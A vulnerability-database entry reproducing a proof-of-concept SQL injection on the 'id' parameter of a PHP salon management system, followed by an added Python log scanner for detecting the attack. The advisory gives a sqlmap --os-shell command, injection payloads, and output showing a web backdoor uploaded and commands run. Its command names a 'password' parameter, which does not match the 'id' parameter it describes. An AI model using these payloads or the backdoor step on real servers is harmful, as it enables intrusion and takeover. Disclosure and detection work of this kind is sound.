| Title | Simple Online Men's Salon Management System - SQL Injection |
|---|
| Description | # Exploit Title: Simple Online Men's Salon Management System - SQL Injection
# Exploit Author: Pratik Shetty
# Vendor Name: oretnom23
# Vendor Homepage: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Software Link: https://www.sourcecodester.com/php/15069/simple-online-mens-salon-management-system-php-free-source-code.html
# Version: v1.0
# Tested on: Windows 11, Apache
Description:-
A SQL Injection issue in Simple Online Men's Salon Management System allows an attacker to obtain complete remote access to the website, including the database, the files and everything else.

Payload used:-
```
python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell
```

Parameter:-
read.txt is our payload file (the saved request below)
```
GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=06rf7g4o1p13b8d4kpci1fobjb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
```
Steps to reproduce:-
1. Here we take the GET request of "http://localhost/msms/admin/?page=user/manage_user&id=3", just this page only.
2. In this we target our parameter as "id" and save the request to a txt file.
3. Now we use the "SQLMap" tool with the following command:
**python sqlmap.py -r read.TXT -p password --risk 2 --level 3 --os-shell**
4. As we can see, we got complete access to the server:
```
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 21 to 40 columns'
[01:57:18] [INFO] testing 'MySQL UNION query (74) - 41 to 60 columns'
[01:57:19] [INFO] testing 'MySQL UNION query (74) - 61 to 80 columns'
[01:57:20] [INFO] testing 'MySQL UNION query (74) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: page=user/manage_user&id=3' AND 4129=(SELECT (CASE WHEN (4129=4129) THEN 4129 ELSE (SELECT 2453 UNION SELECT 1417) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: page=user/manage_user&id=3' AND (SELECT 7719 FROM(SELECT COUNT(*),CONCAT(0x7171706271,(SELECT (ELT(7719=7719,1))),0x716b717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- vkYP
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=user/manage_user&id=3' AND (SELECT 4180 FROM (SELECT(SLEEP(5)))ffuw)-- mIxN
---
[01:58:04] [INFO] the back-end DBMS is MySQL
web application technology: PHP 8.2.4, Apache 2.4.56
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[01:58:04] [INFO] going to use a web backdoor for command prompt
[01:58:04] [INFO] fingerprinting the back-end DBMS operating system
[01:58:04] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
[01:58:10] [INFO] retrieved the web server document root: 'C:\xampp\htdocs'
[01:58:10] [INFO] retrieved web server absolute paths: 'C:/xampp/htdocs/msms/admin/index.php, C:/xampp/htdocs/msms/admin/user/manage_user.php'
[01:58:10] [INFO] trying to upload the file stager on 'C:/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[01:58:10] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpuqhar.php
[01:58:10] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://localhost:80/tmpbfbsc.php
[01:58:10] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ls
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
'ls' is not recognized as an internal or external command,
operable program or batch file.
---
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: 'laptop-*********\pratik shetty'
os-shell>
``` |
|---|
| Source | https://github.com/draco1725/POC/blob/main/Exploit/Simple%20Online%20Men039;s%20Salon%20Management%20System/SQL%20Injection |
|---|
| User | draco (UID 24011) |
|---|
| Submitted | 23/07/2023 22:40 (3 years ago) |
|---|
| Moderation | 27/07/2023 21:49 (4 days later) |
|---|
| Status | accepted |
|---|
| VulDB Entry | 235608 [SourceCodester Simple Online Mens Salon Management System 1.0 manage_user&id=3 ID SQL Injection] |
|---|
| Points | 20 |
|---|
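Defender's counterpart to the sqlmap run recorded in the advisory above, added here and not part of the advisory or the vendor's code: a Python scan of constructed Apache-style access-log lines that flags non-numeric `id` values sent to `manage_user` (labelling the boolean, error and time-based payload shapes the sqlmap output reports) and requests to the `tmp*.php` stager and backdoor names it uploaded to the document root. The log lines and the stager file-name pattern are assumptions.

```python
"""Spot the manage_user id injection and the os-shell stager in Apache access
logs. Added example, not code from the advisory or the vendor; the log lines
are constructed to mimic the requests the sqlmap run above would produce."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines (common log format, only the fields used here).
SAMPLE_LOG = """\
127.0.0.1 - - [23/Jul/2023:01:57:18 +0530] "GET /msms/admin/?page=user/manage_user&id=3 HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:57:19 +0530] "GET /msms/admin/?page=user/manage_user&id=3%27%20AND%204129%3D%28SELECT%20%28CASE%20WHEN%20%284129%3D4129%29%20THEN%204129%20ELSE%20%28SELECT%202453%20UNION%20SELECT%201417%29%20END%29%29--%20- HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:57:20 +0530] "GET /msms/admin/?page=user/manage_user&id=3%27%20AND%20%28SELECT%204180%20FROM%20%28SELECT%28SLEEP%285%29%29%29ffuw%29--%20mIxN HTTP/1.1" 200 5120
127.0.0.1 - - [23/Jul/2023:01:58:10 +0530] "GET /tmpuqhar.php HTTP/1.1" 200 1200
127.0.0.1 - - [23/Jul/2023:01:58:15 +0530] "POST /tmpbfbsc.php HTTP/1.1" 200 300
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)')
# Markers of the three sqlmap techniques the advisory reports (boolean, error and time based).
SQLI_RE = re.compile(r"\bAND\b.*\bSELECT\b|FLOOR\s*\(\s*RAND\s*\(|\bSLEEP\s*\(", re.I)
# Assumption: stager/backdoor names follow the shape seen in the sqlmap output (tmp + 5 letters + .php).
STAGER_RE = re.compile(r"^/tmp[a-z]{5}\.php$")

def classify(line):
    """Return a finding label for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query)            # percent-decodes the id value for us
    if url.path == "/msms/admin/" and params.get("page", [""])[0] == "user/manage_user":
        raw_id = params.get("id", [""])[0]
        if not raw_id.isdigit():            # manage_user only ever expects a numeric id
            return "sqli-payload" if SQLI_RE.search(raw_id) else "non-numeric-id"
    if STAGER_RE.match(url.path):
        return "possible-os-shell-stager"
    return None

def scan(log_text):
    """Return (timestamp, label) for every flagged line in the log text."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            findings.append((LOG_RE.match(line).group("ts"), label))
    return findings

if __name__ == "__main__":
    for ts, label in scan(SAMPLE_LOG):
        print(ts, label)
```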